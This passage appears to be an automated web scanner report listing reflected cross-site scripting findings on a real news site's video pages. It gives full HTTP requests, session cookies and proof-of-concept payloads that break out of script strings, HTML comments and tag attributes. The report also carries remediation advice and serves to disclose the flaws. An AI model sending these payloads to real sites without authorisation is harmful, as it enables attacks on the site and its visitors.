Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633e0a45"-alert(1)-"19c3ad2c058/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:33 GMT Date: Mon, 22 Nov 2010 00:37:33 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106755
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... "text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2cdd5"-alert(1)-"cc78e87875d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits2cdd5"-alert(1)-"cc78e87875d/678922783001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=273 Expires: Mon, 22 Nov 2010 00:42:13 GMT Date: Mon, 22 Nov 2010 00:37:40 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106770
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49409"-alert(1)-"d0e080d2a60 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/67892278300149409"-alert(1)-"d0e080d2a60 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=288 Expires: Mon, 22 Nov 2010 00:42:49 GMT Date: Mon, 22 Nov 2010 00:38:01 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106755
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload a16d4--><script>alert(1)</script>6939ec5827d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videoa16d4--><script>alert(1)</script>6939ec5827d/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29487 Vary: Accept-Encoding Cache-Control: max-age=278 Expires: Mon, 22 Nov 2010 00:45:02 GMT Date: Mon, 22 Nov 2010 00:40:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videoa16d4--><script>alert(1)</script>6939ec5827d/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5ebd"><a>fbbbc1e6440 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videod5ebd"><a>fbbbc1e6440/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29448 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:44:56 GMT Date: Mon, 22 Nov 2010 00:39:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videod5ebd"><a>fbbbc1e6440 ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6150c"><a>62255968c42 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos6150c"><a>62255968c42/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:45:26 GMT Date: Mon, 22 Nov 2010 00:40:26 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106769
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos6150c"><a>62255968c42 c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45720"-alert(1)-"e14c5a60747 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos45720"-alert(1)-"e14c5a60747/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:46:28 GMT Date: Mon, 22 Nov 2010 00:41:28 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106801
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eeaa9"-alert(1)-"9d76291781f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latesteeaa9"-alert(1)-"9d76291781f/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=286 Expires: Mon, 22 Nov 2010 00:47:06 GMT Date: Mon, 22 Nov 2010 00:42:20 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106828
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... "text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1eea"><a>5becca496a1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latestd1eea"><a>5becca496a1/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=282 Expires: Mon, 22 Nov 2010 00:46:19 GMT Date: Mon, 22 Nov 2010 00:41:37 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106794
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latestd1eea"><a>5becca496a1"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d7bf"-alert(1)-"d14a327ddc9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/18158166332d7bf"-alert(1)-"d14a327ddc9/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:45 GMT Date: Mon, 22 Nov 2010 00:42:45 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106780
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3eec1"-alert(1)-"be3d8efd9a6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally3eec1"-alert(1)-"be3d8efd9a6/656445394001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:56 GMT Date: Mon, 22 Nov 2010 00:42:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106773
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8b3e"-alert(1)-"f2dd299395f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/could-you-even-hear-anything-at-jon-stewarts-dc-rally/656445394001e8b3e"-alert(1)-"f2dd299395f HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:48:09 GMT Date: Mon, 22 Nov 2010 00:43:09 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106780
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d6bf"><a>d952bced43f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video6d6bf"><a>d952bced43f/latest-videos/latest/1815816633/cowboys-and-aliens-trailer/681412282001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29421 Vary: Accept-Encoding Cache-Control: max-age=273 Expires: Mon, 22 Nov 2010 00:38:54 GMT Date: Mon, 22 Nov 2010 00:34:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video6d6bf"><a>d952bced43f ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 55abb--><script>alert(1)</script>39448b1449 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video55abb--><script>alert(1)</script>39448b1449/latest-videos/latest/1815816633/cowboys-and-aliens-trailer/681412282001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29458 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:40:25 GMT Date: Mon, 22 Nov 2010 00:35:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video55abb--><script>alert(1)</script>39448b1449/latest-videos/latest/1815816633/cowboys-and-aliens-trailer/681412282001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2eb87"><a>3c05f69f86c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos2eb87"><a>3c05f69f86c/latest/1815816633/cowboys-and-aliens-trailer/681412282001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:40:30 GMT Date: Mon, 22 Nov 2010 00:35:30 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106757
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos2eb87"><a>3c05f69f86c c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cb36"-alert(1)-"8e4a84dbfce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos6cb36"-alert(1)-"8e4a84dbfce/latest/1815816633/cowboys-and-aliens-trailer/681412282001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:41:38 GMT Date: Mon, 22 Nov 2010 00:36:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106781
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37ef3"><a>5441048f7e0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latest37ef3"><a>5441048f7e0/1815816633/cowboys-and-aliens-trailer/681412282001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:41:44 GMT Date: Mon, 22 Nov 2010 00:36:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106767
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latest37ef3"><a>5441048f7e0"> ...[SNIP]...
